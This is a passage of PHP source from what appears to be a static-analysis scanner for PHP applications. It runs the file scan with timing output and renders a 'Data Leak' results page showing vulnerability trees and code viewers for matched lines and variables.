."\n"; @ob_flush(); flush(); $scan = new Scanner($file_scanning, $scan_functions, array(), array()); $scan->parse(); $overall_time += microtime(TRUE) - $thisfile_start; // timeleft = average_time_per_file * file_amount_left $timeleft = round(($overall_time/($fit+1)) * ($file_amount - $fit+1),2); } echo "STATS_DONE.\n"; @ob_flush(); flush(); } $elapsed = microtime(TRUE) - $start; ################################ RESULT ################################# $treestyle = $_POST['treestyle']; function checkLeak($tree, $line, $varname) { if($tree->children) { foreach ($tree->children as $child) { // really dirty :( if(preg_match("/$line:.*markVariable\('$varname/", $child->value)) return true; return checkLeak($child, $line, $varname); } } return false; } // check for line leaks found in vulnblock function lineLeakes($line, $var, $block) { foreach($block->treenodes as $tree) { if(checkLeak($tree, $line, $var)) return true; } return false; } if(!empty($output)) { $nr=0; reset($output); do { if(key($output) != "" && !empty($output[key($output)]) ) { foreach($output[key($output)] as $vulnBlock) { if(lineLeakes($_POST['line'], str_replace('$','',$_POST['varname']), $vulnBlock)) { $nr++; echo '<div style="margin-left:10px;margin-top:10px"><div class="vulnblock">', '<div id="picleak',$nr,'" class="minusico" name="picleak" style="margin-top:5px" title="minimize"', ' onClick="hide(\'leak',$nr,'\')"></div><div class="vulnblocktitle">Data Leak</div>', '</div><div name="allcats"><div class="vulnblock" style="border-top:0px;" name="leak" id="leak',$nr,'">'; if($treestyle == 2) krsort($vulnBlock->treenodes); foreach($vulnBlock->treenodes as $tree) { echo '<div class="codebox"><table border=0>',"\n", '<tr><td valign="top" nowrap>',"\n", '<div class="fileico" title="review code" ', 'onClick="openCodeViewer(this,\'', addslashes($tree->filename), '\',\'', implode(',', $tree->lines), '\');"></div>'."\n", '<div id="pic',key($output),$tree->lines[0],'" class="minusico" title="minimize"', ' onClick="hide(\'',addslashes(key($output)),$tree->lines[0],'\')"></div><br />',"\n"; echo '</td><td><span class="vulntitle">The return value of the sensitive sink is embedded into the HTML output.</span>', '<div class="code" id="',key($output),$tree->lines[0],'">',"\n"; if($treestyle == 1) traverseBottomUp($tree); else if($treestyle == 2) traverseTopDown($tree); echo '<ul><li>',"\n"; dependenciesTraverse($tree); echo '</li></ul>',"\n", '</div>',"\n", '</td></tr></table></div>',"\n"; } echo '</div></div><div style="height:20px"></div></div>',"\n"; } } } } while(next($output)); } ?>